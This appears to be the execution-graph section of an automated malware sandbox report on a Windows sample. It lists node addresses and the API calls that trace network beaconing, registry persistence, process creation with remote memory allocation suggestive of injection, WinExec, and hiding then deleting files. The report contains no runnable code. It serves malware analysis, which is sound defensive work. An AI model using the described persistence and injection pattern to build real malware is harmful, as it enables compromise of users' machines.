                                              • String ID: ?O@
                                              • API String ID: 1431749950-3511380453
                                              • Opcode ID: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                              • Instruction ID: 315e17eccb05daff3adc91fa9074d23558c2207180d60d9b2b56ce26dbf77fcb
                                              • Opcode Fuzzy Hash: 0f0cab1a5fe64df75075e876fd7e6a607817ca224d69030a73e0dc08c334b9f4
                                              • Instruction Fuzzy Hash: 24F06272200118BFDB00AFA9DC458AEB7EDEF88764B51402BF904D72A1D7B4AD008B98

                                              Execution Graph

                                              Execution Coverage:3.6%
                                              Dynamic/Decrypted Code Coverage:22.2%
                                              Signature Coverage:5.4%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:96
                                              execution_graph 130364 10003200 Sleep 130365 10020254 130364->130365 130366 10002d80 ResetEvent InterlockedExchange timeGetTime socket 130367 10002de8 130366->130367 130368 10002dfc lstrlenW WideCharToMultiByte 130366->130368 130420 10006815 130367->130420 130387 100067ff 130368->130387 130371 10002df6 130373 10002e59 moneypunct 130374 10002e60 htons connect 130373->130374 130375 10002e96 130373->130375 130374->130375 130377 10002eab setsockopt setsockopt setsockopt setsockopt 130374->130377 130376 10006815 __cftoe_l 5 API calls 130375->130376 130378 10002ea5 130376->130378 130379 10002f52 InterlockedExchange 130377->130379 130380 10002f24 WSAIoctl 130377->130380 130399 1000721b 130379->130399 130380->130379 130383 1000721b 748 API calls 130384 10002f91 130383->130384 130385 10006815 __cftoe_l 5 API calls 130384->130385 130386 10002fa6 130385->130386 130389 10006f17 130387->130389 130390 10002e22 lstrlenW WideCharToMultiByte gethostbyname 130389->130390 130392 10006f3d std::exception::exception 130389->130392 130428 10006e83 130389->130428 130445 10008550 DecodePointer 130389->130445 130390->130373 130393 10006f7b 130392->130393 130446 100073e9 76 API calls __cinit 130392->130446 130447 10006e24 66 API calls std::exception::operator= 130393->130447 130395 10006f85 130448 10007836 RaiseException 130395->130448 130398 10006f96 130400 1000722b 130399->130400 130401 1000723f 130399->130401 130484 1000710d 66 API calls __getptd_noexit 130400->130484 130457 10009754 TlsGetValue 130401->130457 130405 10007230 130485 10008702 11 API calls __lseeki64 130405->130485 130409 100072a2 130486 10006e49 66 API calls 2 library calls 130409->130486 130412 100072a8 130414 10002f79 130412->130414 130487 10007133 66 API calls 2 library calls 130412->130487 130414->130383 130417 10007267 CreateThread 130417->130414 130419 1000729a GetLastError 130417->130419 130545 100071b6 130417->130545 130419->130409 130421 1000681d 130420->130421 130422 1000681f IsDebuggerPresent 130420->130422 130421->130371 130968 1000b5e6 130422->130968 130425 1000794f SetUnhandledExceptionFilter UnhandledExceptionFilter 130426 10007974 GetCurrentProcess TerminateProcess 130425->130426 130427 1000796c __call_reportfault 130425->130427 130426->130371 130427->130426 130429 10006f00 130428->130429 130434 10006e91 130428->130434 130455 10008550 DecodePointer 130429->130455 130431 10006f06 130456 1000710d 66 API calls __getptd_noexit 130431->130456 130435 10006ebf RtlAllocateHeap 130434->130435 130438 10006e9c 130434->130438 130439 10006eec 130434->130439 130443 10006eea 130434->130443 130452 10008550 DecodePointer 130434->130452 130435->130434 130436 10006ef8 130435->130436 130436->130389 130438->130434 130449 10008508 66 API calls __NMSG_WRITE 130438->130449 130450 10008359 66 API calls 6 library calls 130438->130450 130451 10008098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 130438->130451 130453 1000710d 66 API calls __getptd_noexit 130439->130453 130454 1000710d 66 API calls __getptd_noexit 130443->130454 130445->130389 130446->130393 130447->130395 130448->130398 130449->130438 130450->130438 130452->130434 130453->130443 130454->130436 130455->130431 130456->130436 130458 10007245 130457->130458 130459 10009769 DecodePointer TlsSetValue 130457->130459 130460 10009fe4 130458->130460 130459->130458 130462 10009fed 130460->130462 130463 10007251 130462->130463 130464 1000a00b Sleep 130462->130464 130488 1000e555 130462->130488 130463->130409 130466 1000990f 130463->130466 130465 1000a020 130464->130465 130465->130462 130465->130463 130499 10009896 GetLastError 130466->130499 130468 10009917 130469 1000725e 130468->130469 130513 10008315 66 API calls 3 library calls 130468->130513 130471 100097e2 130469->130471 130515 10009db0 130471->130515 130473 100097ee GetModuleHandleW 130516 1000c144 130473->130516 130475 1000982c InterlockedIncrement 130523 10009884 130475->130523 130478 1000c144 __lock 64 API calls 130479 1000984d 130478->130479 130526 1000de7f InterlockedIncrement 130479->130526 130481 1000986b 130538 1000988d 130481->130538 130483 10009878 __fcloseall 130483->130417 130484->130405 130485->130414 130486->130412 130487->130414 130489 1000e561 130488->130489 130493 1000e57c 130488->130493 130490 1000e56d 130489->130490 130489->130493 130497 1000710d 66 API calls __getptd_noexit 130490->130497 130491 1000e58f RtlAllocateHeap 130491->130493 130493->130491 130496 1000e5b6 130493->130496 130498 10008550 DecodePointer 130493->130498 130494 1000e572 130494->130462 130496->130462 130497->130494 130498->130493 130500 10009754 ___set_flsgetvalue 3 API calls 130499->130500 130501 100098ad 130500->130501 130502 10009903 SetLastError 130501->130502 130503 10009fe4 __calloc_crt 62 API calls 130501->130503 130502->130468 130504 100098c1 130503->130504 130504->130502 130505 100098c9 DecodePointer 130504->130505 130506 100098de 130505->130506 130507 100098e2 130506->130507 130508 100098fa 130506->130508 130509 100097e2 __CRT_INIT@12 62 API calls 130507->130509 130514 10006e49 66 API calls 2 library calls 130508->130514 130511 100098ea GetCurrentThreadId 130509->130511 130511->130502 130512 10009900 130512->130502 130514->130512 130515->130473 130517 1000c159 130516->130517 130518 1000c16c EnterCriticalSection 130516->130518 130541 1000c082 66 API calls 8 library calls 130517->130541 130518->130475 130520 1000c15f 130520->130518 130542 10008315 66 API calls 3 library calls 130520->130542 130543 1000c06b LeaveCriticalSection 130523->130543 130525 10009846 130525->130478 130527 1000dea0 130526->130527 130528 1000de9d InterlockedIncrement 130526->130528 130529 1000deaa InterlockedIncrement 130527->130529 130530 1000dead 130527->130530 130528->130527 130529->130530 130531 1000deb7 InterlockedIncrement 130530->130531 130532 1000deba 130530->130532 130531->130532 130533 1000dec4 InterlockedIncrement 130532->130533 130535 1000dec7 130532->130535 130533->130535 130534 1000dee0 InterlockedIncrement 130534->130535 130535->130534 130536 1000def0 InterlockedIncrement 130535->130536 130537 1000defb InterlockedIncrement 130535->130537 130536->130535 130537->130481 130544 1000c06b LeaveCriticalSection 130538->130544 130540 10009894 130540->130483 130541->130520 130543->130525 130544->130540 130546 10009754 ___set_flsgetvalue 3 API calls 130545->130546 130547 100071c1 130546->130547 130560 10009734 TlsGetValue 130547->130560 130550 100071d0 130611 10009788 DecodePointer 130550->130611 130551 100071fa 130562 10009929 130551->130562 130553 10007215 130598 10007175 130553->130598 130556 100071df 130558 100071f0 GetCurrentThreadId 130556->130558 130559 100071e3 GetLastError ExitThread 130556->130559 130558->130553 130561 100071cc 130560->130561 130561->130550 130561->130551 130563 10009935 __fcloseall 130562->130563 130564 1000994d 130563->130564 130565 10009a37 __fcloseall 130563->130565 130612 10006e49 66 API calls 2 library calls 130563->130612 130567 1000995b 130564->130567 130613 10006e49 66 API calls 2 library calls 130564->130613 130565->130553 130568 10009969 130567->130568 130614 10006e49 66 API calls 2 library calls 130567->130614 130571 10009977 130568->130571 130615 10006e49 66 API calls 2 library calls 130568->130615 130573 10009985 130571->130573 130616 10006e49 66 API calls 2 library calls 130571->130616 130575 10009993 130573->130575 130617 10006e49 66 API calls 2 library calls 130573->130617 130576 100099a1 130575->130576 130618 10006e49 66 API calls 2 library calls 130575->130618 130579 100099b2 130576->130579 130619 10006e49 66 API calls 2 library calls 130576->130619 130581 1000c144 __lock 66 API calls 130579->130581 130582 100099ba 130581->130582 130583 100099df 130582->130583 130584 100099c6 InterlockedDecrement 130582->130584 130621 10009a43 LeaveCriticalSection _doexit 130583->130621 130584->130583 130586 100099d1 130584->130586 130586->130583 130620 10006e49 66 API calls 2 library calls 130586->130620 130587 100099ec 130588 1000c144 __lock 66 API calls 130587->130588 130590 100099f3 130588->130590 130591 10009a24 130590->130591 130622 1000df0e 8 API calls 130590->130622 130599 10007181 __fcloseall 130598->130599 130600 1000990f __getptd 66 API calls 130599->130600 130601 10007186 130600->130601 130626 100052b0 130601->130626 130637 100030c0 130601->130637 130642 10002fb0 130601->130642 130652 100052d9 130601->130652 130602 10007190 130663 10007156 130602->130663 130611->130556 130612->130564 130613->130567 130614->130568 130615->130571 130616->130573 130617->130575 130618->130576 130619->130579 130620->130583 130621->130587 130627 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 130626->130627 130632 100052cc 130626->130632 130628 1000543c 130627->130628 130629 100053ca 130627->130629 130691 41a0497 130628->130691 130633 10005403 OpenProcess 130629->130633 130635 1000542f Sleep 130629->130635 130669 10005820 130629->130669 130632->130627 130633->130629 130634 10005415 GetExitCodeProcess 130633->130634 130634->130629 130635->130633 130638 10003128 130637->130638 130641 100030d4 130637->130641 130638->130602 130639 100030e8 Sleep 130639->130641 130640 10003104 timeGetTime 130640->130641 130641->130638 130641->130639 130641->130640 130643 100067ff 77 API calls 130642->130643 130644 10002fd3 130643->130644 130645 1000306d 130644->130645 130646 10003014 select 130644->130646 130649 10003032 recv 130644->130649 130651 1000710d 66 API calls __lseeki64 130644->130651 130885 10003350 130644->130885 130647 10006815 __cftoe_l 5 API calls 130645->130647 130646->130644 130646->130645 130648 10003098 130647->130648 130648->130602 130649->130644 130651->130644 130654 100052d2 130652->130654 130653 1000536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 130655 100053ca 130653->130655 130656 1000543c 130653->130656 130654->130653 130657 10005820 103 API calls 130655->130657 130659 10005403 OpenProcess 130655->130659 130661 1000542f Sleep 130655->130661 130662 41a0497 578 API calls 130656->130662 130657->130655 130658 10005442 130658->130602 130659->130655 130660 10005415 GetExitCodeProcess 130659->130660 130660->130655 130661->130659 130662->130658 130664 10009896 __getptd_noexit 66 API calls 130663->130664 130665 10007160 130664->130665 130666 1000716b ExitThread 130665->130666 130967 10009a58 79 API calls __freefls@4 130665->130967 130668 1000716a 130668->130666 130670 1000584e _memset 130669->130670 130671 100058a2 GetSystemDirectoryA 130670->130671 130696 100059e0 95 API calls _vswprintf_s 130671->130696 130673 100058d6 GetFileAttributesA 130674 1000590b CreateProcessA 130673->130674 130675 100058eb 130673->130675 130676 10005940 VirtualAllocEx 130674->130676 130677 10005932 130674->130677 130697 100059e0 95 API calls _vswprintf_s 130675->130697 130681 100059ac 130676->130681 130679 10006815 __cftoe_l 5 API calls 130677->130679 130682 10005908 130682->130674 130698 41a00cd GetPEB 130691->130698 130693 41a04a8 130695 41a04e0 130693->130695 130700 41a01cb 130693->130700 130695->130602 130696->130673 130697->130682 130699 41a00e5 130698->130699 130699->130693 130701 41a01e6 130700->130701 130706 41a01df 130700->130706 130702 41a021e VirtualAlloc 130701->130702 130701->130706 130705 41a0238 130702->130705 130702->130706 130706->130695 130886 10003366 130885->130886 130897 10001100 130886->130897 130888 100034e1 130888->130644 130889 100034c6 130890 100011b0 70 API calls 130889->130890 130891 100034d8 130890->130891 130891->130644 130892 10003378 _memmove 130892->130888 130892->130889 130893 10003403 timeGetTime 130892->130893 130895 100011b0 70 API calls 130892->130895 130914 100054c0 130892->130914 130905 100011b0 130893->130905 130895->130892 130898 10001111 130897->130898 130899 1000110b 130897->130899 130946 10006ba0 130898->130946 130899->130892 130901 10001134 VirtualAlloc 130915 100054dc 130914->130915 130939 1000580d 130914->130939 130916 10005707 VirtualAlloc 130915->130916 130917 100054e7 RegOpenKeyExW 130915->130917 130939->130892 130947 10007d77 __ctrlfp __floor_pentium4 130946->130947 130948 10006bad 130946->130948 130950 10007de5 __floor_pentium4 130947->130950 130953 10007dc2 130947->130953 130954 10007dd2 __ctrlfp 130947->130954 130948->130947 130949 10006bde 130948->130949 130955 10006c28 130949->130955 130957 10007a9b 67 API calls __lseeki64 130949->130957 130950->130954 130959 1000bc80 67 API calls 6 library calls 130950->130959 130958 1000bc2b 66 API calls 3 library calls 130953->130958 130954->130901 130955->130901 130957->130955 130958->130954 130959->130954 130967->130668 130968->130425 130969 2210e0 130970 2210ec ___scrt_is_nonwritable_in_current_image 130969->130970 130993 2212dc IsProcessorFeaturePresent ___scrt_uninitialize_crt 130970->130993 130972 2210f3 130973 221246 130972->130973 130976 22111d 130972->130976 131008 2215d0 6 API calls 130973->131008 130975 22124d exit 130977 221253 _exit 130975->130977 130978 221121 _initterm_e 130976->130978 130981 22116a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 130976->130981 130979 22113c 130978->130979 130980 22114d _initterm 130978->130980 130980->130981 130982 2211be 130981->130982 130986 2211b6 _register_thread_local_exe_atexit_callback 130981->130986 130994 2216eb memset GetStartupInfoW 130982->130994 130984 2211c3 _get_narrow_winmain_command_line 130995 221c50 GetCommandLineW CommandLineToArgvW 130984->130995 130986->130982 130987 2211d8 131007 221721 GetModuleHandleW 130987->131007 130989 2211df 130989->130975 130990 2211e3 130989->130990 130991 2211e7 _cexit 130990->130991 130992 2211ec ___scrt_uninitialize_crt 130990->130992 130991->130992 130992->130979 130993->130972 130994->130984 130996 221c82 130995->130996 130997 221c78 130995->130997 131009 221d6f 130996->131009 130997->130987 130999 221ca0 131000 221d1c LocalFree 130999->131000 131001 221cc1 WideCharToMultiByte 130999->131001 131019 221000 TCGamerUpdateMain 131000->131019 131003 221d6f 4 API calls 131001->131003 131004 221ce1 WideCharToMultiByte 131003->131004 131004->131001 131005 221d14 131004->131005 131005->131000 131006 221d35 131006->130987 131007->130989 131008->130975 131010 221d7d 131009->131010 131011 221d8f malloc 131010->131011 131012 221d82 _callnewh 131011->131012 131013 221d9c 131011->131013 131012->131011 131015 221d9e 131012->131015 131013->130999 131014 221e9f 131016 221ead _CxxThrowException 131014->131016 131015->131014 131017 221e90 _CxxThrowException 131015->131017 131018 221ec3 131016->131018 131017->131014 131018->130999 131019->131006 131020 6c1c5c94 131075 6c1c95d7 131020->131075 131023 6c1c5d84 std::ios_base::_Ios_base_dtor _memcpy_s 131032 6c1c5e3d GetFileAttributesA 131023->131032 131024 6c1c664a 131097 6c1b22c0 31 API calls 4 library calls 131024->131097 131025 6c1c5db4 131030 6c1c95d7 ___CxxFrameHandler 16 API calls 131025->131030 131026 6c1c5d77 131087 6c1b1ba0 31 API calls ___CxxFrameHandler 131026->131087 131029 6c1c6656 131098 6c1b22c0 31 API calls 4 library calls 131029->131098 131030->131023 131035 6c1c5e4d SHGetFolderPathA 131032->131035 131039 6c1c643f std::ios_base::_Ios_base_dtor 131032->131039 131033 6c1c6662 131099 6c1b22c0 31 API calls 4 library calls 131033->131099 131035->131039 131042 6c1c5e6f _strlen 131035->131042 131036 6c1c666e 131100 6c1b22c0 31 API calls 4 library calls 131036->131100 131037 6c1c65fa std::ios_base::_Ios_base_dtor 131039->131037 131092 6c31ae8c 131039->131092 131040 6c1c667a 131101 6c1b22c0 31 API calls 4 library calls 131040->131101 131042->131029 131045 6c1c5edb 131042->131045 131046 6c1c5ee6 131042->131046 131052 6c1c5e96 _memcpy_s 131042->131052 131044 6c1c6686 131102 6c1b2572 31 API calls 3 library calls 131044->131102 131088 6c1b1ba0 31 API calls ___CxxFrameHandler 131045->131088 131049 6c1c95d7 ___CxxFrameHandler 16 API calls 131046->131049 131049->131052 131050 6c1c6698 131051 6c1c5f3f 131089 6c1b1ba0 31 API calls ___CxxFrameHandler 131051->131089 131052->131033 131052->131051 131054 6c1c6634 131052->131054 131058 6c1c5f48 std::ios_base::_Ios_base_dtor _memcpy_s 131052->131058 131055 6c1c95d7 ___CxxFrameHandler 16 API calls 131054->131055 131055->131058 131056 6c1c60ba 131090 6c1b1ba0 31 API calls ___CxxFrameHandler 131056->131090 131058->131036 131058->131039 131058->131056 131059 6c1c6526 131058->131059 131064 6c1c60c7 std::ios_base::_Ios_base_dtor _memcpy_s 131058->131064 131060 6c1c95d7 ___CxxFrameHandler 16 API calls 131059->131060 131060->131064 131061 6c1c623a 131091 6c1b1ba0 31 API calls ___CxxFrameHandler 131061->131091 131063 6c1c6549 131065 6c1c95d7 ___CxxFrameHandler 16 API calls 131063->131065 131064->131039 131064->131040 131064->131061 131064->131063 131068 6c1c624a std::ios_base::_Ios_base_dtor _memcpy_s 131064->131068 131065->131068 131066 6c1c6433 GetFileAttributesA 131066->131039 131067 6c1c648b CoInitialize CoCreateInstance 131066->131067 131069 6c1c6594 CoUninitialize 131067->131069 131070 6c1c64b3 MultiByteToWideChar 131067->131070 131068->131039 131068->131066 131069->131039 131073 6c1c64ed 131070->131073 131072 6c1c6582 131072->131069 131073->131072 131074 6c1c655d MultiByteToWideChar 131073->131074 131074->131072 131076 6c1c95dc 131075->131076 131078 6c1c5ce1 131076->131078 131080 6c1c95f8 131076->131080 131103 6c31f1bd 131076->131103 131110 6c318beb EnterCriticalSection LeaveCriticalSection ___CxxFrameHandler 131076->131110 131078->131023 131078->131024 131078->131025 131078->131026 131081 6c1e6778 ___CxxFrameHandler 131080->131081 131082 6c1e5bb6 Concurrency::cancel_current_task 131080->131082 131112 6c30b6f1 RaiseException 131081->131112 131111 6c30b6f1 RaiseException 131082->131111 131084 6c1e6794 131086 6c1e5bd2 131087->131023 131088->131052 131089->131058 131090->131064 131091->131068 131115 6c31b0cb 29 API calls 2 library calls 131092->131115 131094 6c31ae9b 131116 6c31aea9 11 API calls std::locale::_Setgloballocale 131094->131116 131096 6c31aea8 131097->131029 131098->131033 131099->131036 131100->131040 131101->131044 131102->131050 131109 6c3223f1 _unexpected 131103->131109 131104 6c32242f 131114 6c30ea09 14 API calls _memcpy_s 131104->131114 131106 6c32241a RtlAllocateHeap 131107 6c32242d 131106->131107 131106->131109 131107->131076 131109->131104 131109->131106 131113 6c318beb EnterCriticalSection LeaveCriticalSection ___CxxFrameHandler 131109->131113 131110->131076 131111->131086 131112->131084 131113->131109 131114->131107 131115->131094 131116->131096 131117 1000638b 131118 10001100 70 API calls 131117->131118 131119 10006390 131118->131119 131120 1000474c lstrlenW 131121 1001fff8 131120->131121 131122 6c1c1991 131123 6c1c19a6 std::ios_base::_Ios_base_dtor 131122->131123 131124 6c1c1a19 WinExec 131123->131124 131210 6c1c2208 std::ios_base::_Ios_base_dtor 131123->131210 131126 6c1c95d7 ___CxxFrameHandler 16 API calls 131124->131126 131125 6c31ae8c ___CxxFrameHandler 29 API calls 131127 6c1c2809 131125->131127 131128 6c1c1a38 131126->131128 131221 6c1b22c0 31 API calls 4 library calls 131127->131221 131212 6c1bf388 131128->131212 131131 6c1c2815 131222 6c1b22c0 31 API calls 4 library calls 131131->131222 131133 6c1c2821 131223 6c1b22c0 31 API calls 4 library calls 131133->131223 131135 6c1c1a83 std::ios_base::_Ios_base_dtor 131138 6c1c95d7 ___CxxFrameHandler 16 API calls 131135->131138 131136 6c1c282d 131224 6c1b22c0 31 API calls 4 library calls 131136->131224 131141 6c1c1ad5 131138->131141 131139 6c1c2839 131225 6c1b22c0 31 API calls 4 library calls 131139->131225 131143 6c1bf388 31 API calls 131141->131143 131142 6c1c2845 131226 6c1b22c0 31 API calls 4 library calls 131142->131226 131147 6c1c1b15 131143->131147 131145 6c1c2851 131227 6c1b22c0 31 API calls 4 library calls 131145->131227 131148 6c1c2905 131147->131148 131150 6c1c1ba0 131147->131150 131159 6c1c2759 131147->131159 131169 6c1c1bb0 std::ios_base::_Ios_base_dtor _memcpy_s _strlen 131147->131169 131242 6c1b22c0 31 API calls 4 library calls 131148->131242 131149 6c1c285d 131228 6c1b22c0 31 API calls 4 library calls 131149->131228 131217 6c1b1ba0 31 API calls ___CxxFrameHandler 131150->131217 131153 6c1c2911 131243 6c1b22c0 31 API calls 4 library calls 131153->131243 131155 6c1c2869 131229 6c1b22c0 31 API calls 4 library calls 131155->131229 131158 6c1c291d 131161 6c1c95d7 ___CxxFrameHandler 16 API calls 131159->131161 131160 6c1c2875 131230 6c1b22c0 31 API calls 4 library calls 131160->131230 131161->131169 131163 6c1c2881 131231 6c1b22c0 31 API calls 4 library calls 131163->131231 131165 6c1c1d33 131218 6c1b1ba0 31 API calls ___CxxFrameHandler 131165->131218 131166 6c1c288d 131232 6c1b22c0 31 API calls 4 library calls 131166->131232 131169->131153 131169->131165 131172 6c1c267a 131169->131172 131176 6c1c1d43 std::ios_base::_Ios_base_dtor _memcpy_s 131169->131176 131169->131210 131170 6c1c2899 131233 6c1b22c0 31 API calls 4 library calls 131170->131233 131174 6c1c95d7 ___CxxFrameHandler 16 API calls 131172->131174 131173 6c1c28a5 131234 6c1b22c0 31 API calls 4 library calls 131173->131234 131174->131176 131179 6c1c1f88 WinExec Sleep 131176->131179 131176->131210 131177 6c1c28b1 131235 6c1b22c0 31 API calls 4 library calls 131177->131235 131184 6c1c1fa6 _strlen 131179->131184 131180 6c1c28bd 131236 6c1b22c0 31 API calls 4 library calls 131180->131236 131182 6c1c28c9 131237 6c1b22c0 31 API calls 4 library calls 131182->131237 131184->131155 131187 6c1c202f 131184->131187 131188 6c1c2024 131184->131188 131193 6c1c1fd9 _memcpy_s 131184->131193 131185 6c1c28d5 131238 6c1b22c0 31 API calls 4 library calls 131185->131238 131191 6c1c95d7 ___CxxFrameHandler 16 API calls 131187->131191 131219 6c1b1ba0 31 API calls ___CxxFrameHandler 131188->131219 131189 6c1c28e1 131239 6c1b22c0 31 API calls 4 library calls 131189->131239 131191->131193 131196 6c1c206d SetFileAttributesA 131193->131196 131194 6c1c28ed 131240 6c1b22c0 31 API calls 4 library calls 131194->131240 131199 6c1c2081 std::ios_base::_Ios_base_dtor _strlen 131196->131199 131197 6c1c28f9 131241 6c1b22c0 31 API calls 4 library calls 131197->131241 131199->131160 131200 6c1c213a 131199->131200 131201 6c1c2145 131199->131201 131204 6c1c20ef _memcpy_s 131199->131204 131199->131210 131220 6c1b1ba0 31 API calls ___CxxFrameHandler 131200->131220 131203 6c1c95d7 ___CxxFrameHandler 16 API calls 131201->131203 131203->131204 131205 6c1c2182 SetFileAttributesA 131204->131205 131206 6c1c2196 std::ios_base::_Ios_base_dtor 131205->131206 131207 6c1c21dd DeleteFileA 131206->131207 131206->131210 131208 6c1c21ef DeleteFileA 131207->131208 131208->131210 131210->131125 131211 6c1c2607 std::ios_base::_Ios_base_dtor 131210->131211 131244 6c1bf46c 131212->131244 131214 6c1bf444 131214->131135 131216 6c1bf3dc 131216->131214 131256 6c1c37c2 31 API calls 3 library calls 131216->131256 131217->131169 131218->131176 131219->131193 131220->131204 131221->131131 131222->131133 131223->131136 131224->131139 131225->131142 131226->131145 131227->131149 131228->131155 131229->131160 131230->131163 131231->131166 131232->131170 131233->131173 131234->131177 131235->131180 131236->131182 131237->131185 131238->131189 131239->131194 131240->131197 131241->131148 131242->131153 131243->131158 131245 6c1bf482 131244->131245 131255 6c1bf540 std::ios_base::_Ios_base_dtor _memcpy_s 131244->131255 131246 6c1bf5d8 131245->131246 131247 6c1bf4a5 131245->131247 131254 6c1bf4f5 _memcpy_s 131245->131254 131245->131255 131258 6c1b22c0 31 API calls 4 library calls 131246->131258 131248 6c1bf4ef 131247->131248 131252 6c1bf5cd 131247->131252 131247->131254 131257 6c1b1ba0 31 API calls ___CxxFrameHandler 131248->131257 131251 6c31ae8c ___CxxFrameHandler 29 API calls 131251->131254 131253 6c1c95d7 ___CxxFrameHandler 16 API calls 131252->131253 131253->131254 131254->131251 131254->131255 131255->131216 131256->131216 131257->131254 131258->131254 131259 10006013 131260 10006045 131259->131260 131261 10020003 131260->131261 131264 10005e07 131260->131264 131267 1000608a 131260->131267 131265 1001f0f9 RegQueryValueExW 131264->131265 131266 10003f35 131265->131266 131266->131266 131268 100060a0 RegOpenKeyExW 131267->131268 131269 10003f35 131268->131269 131270 6c1c6d4f 131271 6c1c6d52 131270->131271 131278 6c1c486c 131271->131278 131273 6c1c6e59 131274 6c1c70d1 CreateThread 131273->131274 131275 6c1c71a1 131274->131275 131913 6c1c50f3 Sleep 131274->131913 131307 6c1c6958 32 API calls 4 library calls 131275->131307 131277 6c1c71c6 131279 6c1c48b3 131278->131279 131308 6c1baab6 131279->131308 131286 6c1c4a61 131286->131273 131288 6c1c491e 131292 6c1c497b 131288->131292 131293 6c1c4986 131288->131293 131298 6c1c4923 _memcpy_s 131288->131298 131289 6c1c4a77 131336 6c1b22c0 31 API calls 4 library calls 131289->131336 131291 6c1c4a7c 131295 6c31ae8c ___CxxFrameHandler 29 API calls 131291->131295 131332 6c1b1ba0 31 API calls ___CxxFrameHandler 131292->131332 131294 6c1c95d7 ___CxxFrameHandler 16 API calls 131293->131294 131294->131298 131297 6c1c4a81 131295->131297 131337 6c1b8e22 72 API calls std::ios_base::_Ios_base_dtor 131297->131337 131333 6c1c4d7e 76 API calls 131298->131333 131301 6c1c4a99 131301->131273 131302 6c1c49d4 131303 6c1c49ec 131302->131303 131304 6c1c4a3d 131302->131304 131303->131291 131306 6c1c4944 std::ios_base::_Ios_base_dtor 131303->131306 131334 6c1b8bb0 81 API calls 131304->131334 131335 6c1b8e22 72 API calls std::ios_base::_Ios_base_dtor 131306->131335 131307->131277 131309 6c1baae8 131308->131309 131338 6c1bac12 131309->131338 131315 6c1bab95 131316 6c1babc0 131315->131316 131353 6c1b1f46 131315->131353 131316->131306 131318 6c1c4abc 131316->131318 131811 6c1baf66 131318->131811 131321 6c1c48e5 131323 6c1c4be8 131321->131323 131324 6c1b1f46 39 API calls 131323->131324 131325 6c1c4c44 131324->131325 131326 6c1baf66 76 API calls 131325->131326 131327 6c1c4c4f 131326->131327 131330 6c1c4c86 131327->131330 131331 6c1b9824 70 API calls 131327->131331 131328 6c1b1f46 39 API calls 131329 6c1c4904 131328->131329 131329->131288 131329->131289 131330->131328 131331->131330 131332->131298 131333->131302 131334->131306 131335->131286 131336->131291 131337->131301 131339 6c1bac4c 131338->131339 131362 6c1ba486 131339->131362 131342 6c1ba346 131432 6c1ba69a 131342->131432 131345 6c1ba3ae 131346 6c1ba3f9 131345->131346 131352 6c1ba3e4 131345->131352 131437 6c1e5aa5 131346->131437 131350 6c1ba418 131446 6c1b9e57 68 API calls 2 library calls 131350->131446 131352->131315 131354 6c1b1f6b 131353->131354 131355 6c1b1f63 131353->131355 131356 6c1b1f7b 131354->131356 131808 6c30b6f1 RaiseException 131354->131808 131355->131316 131809 6c1b20e9 38 API calls 131356->131809 131359 6c1b1fa3 131810 6c30b6f1 RaiseException 131359->131810 131361 6c1b1fc6 131361->131316 131371 6c1ba55e 131362->131371 131367 6c1b1f46 39 API calls 131368 6c1ba4c4 131367->131368 131369 6c1ba4ce 131368->131369 131380 6c1e55ed 9 API calls 2 library calls 131368->131380 131369->131342 131372 6c1c95d7 ___CxxFrameHandler 16 API calls 131371->131372 131373 6c1ba5b5 131372->131373 131381 6c1e5985 131373->131381 131375 6c1ba498 131376 6c1ba5f0 131375->131376 131377 6c1ba62d 131376->131377 131413 6c1b418c 131377->131413 131380->131369 131382 6c1e5991 __EH_prolog3 131381->131382 131393 6c1e5514 131382->131393 131386 6c1e59cd 131399 6c1e5545 131386->131399 131387 6c1e59af 131407 6c1e5a18 41 API calls std::locale::_Setgloballocale 131387->131407 131389 6c1e5a0a Concurrency::details::ExternalContextBase::~ExternalContextBase 131389->131375 131391 6c1e59b7 131408 6c1e580f 15 API calls 2 library calls 131391->131408 131394 6c1e5523 131393->131394 131397 6c1e552a 131393->131397 131409 6c31b59f 6 API calls std::_Lockit::_Lockit 131394->131409 131396 6c1e5528 131396->131386 131406 6c1e588e 16 API calls 2 library calls 131396->131406 131397->131396 131410 6c21189f EnterCriticalSection 131397->131410 131400 6c31b5ad 131399->131400 131401 6c1e554f 131399->131401 131412 6c31b588 LeaveCriticalSection 131400->131412 131402 6c1e5562 131401->131402 131411 6c2118ad LeaveCriticalSection 131401->131411 131402->131389 131405 6c31b5b4 131405->131389 131406->131387 131407->131391 131408->131386 131409->131396 131410->131396 131411->131402 131412->131405 131414 6c1e5514 std::_Lockit::_Lockit 7 API calls 131413->131414 131415 6c1b41c6 131414->131415 131428 6c1b2a86 9 API calls 2 library calls 131415->131428 131417 6c1b41db 131418 6c1b421c 131417->131418 131429 6c1b4372 68 API calls 2 library calls 131417->131429 131419 6c1e5545 std::_Lockit::~_Lockit 2 API calls 131418->131419 131421 6c1b4238 131419->131421 131421->131367 131421->131368 131422 6c1b4201 131423 6c1b424b 131422->131423 131424 6c1b4209 131422->131424 131431 6c1b2ba8 RaiseException CallUnexpected 131423->131431 131430 6c1e5727 16 API calls 2 library calls 131424->131430 131428->131417 131429->131422 131430->131418 131433 6c1c95d7 ___CxxFrameHandler 16 API calls 131432->131433 131434 6c1ba6e5 131433->131434 131435 6c1e5985 45 API calls 131434->131435 131436 6c1ba34e 131435->131436 131436->131345 131438 6c1e5aae 131437->131438 131441 6c1ba407 131438->131441 131447 6c31a511 131438->131447 131441->131352 131445 6c1b9b08 29 API calls 131441->131445 131443 6c1e5b1d 131443->131441 131470 6c31d953 131443->131470 131445->131350 131446->131352 131448 6c31a51c ___scrt_is_nonwritable_in_current_image 131447->131448 131449 6c31a52f 131448->131449 131452 6c31a54f 131448->131452 131488 6c30ea09 14 API calls _memcpy_s 131449->131488 131451 6c31a534 131489 6c31ae7c 29 API calls _memcpy_s 131451->131489 131454 6c31a561 131452->131454 131455 6c31a554 131452->131455 131474 6c328a08 131454->131474 131490 6c30ea09 14 API calls _memcpy_s 131455->131490 131459 6c31a571 131491 6c30ea09 14 API calls _memcpy_s 131459->131491 131460 6c31a57e 131482 6c328dd2 131460->131482 131465 6c1e5b02 131465->131441 131466 6c31a1b4 131465->131466 131467 6c31a1c7 swprintf 131466->131467 131631 6c31a467 131467->131631 131469 6c31a1dc swprintf 131469->131443 131471 6c31d966 swprintf 131470->131471 131742 6c31da11 131471->131742 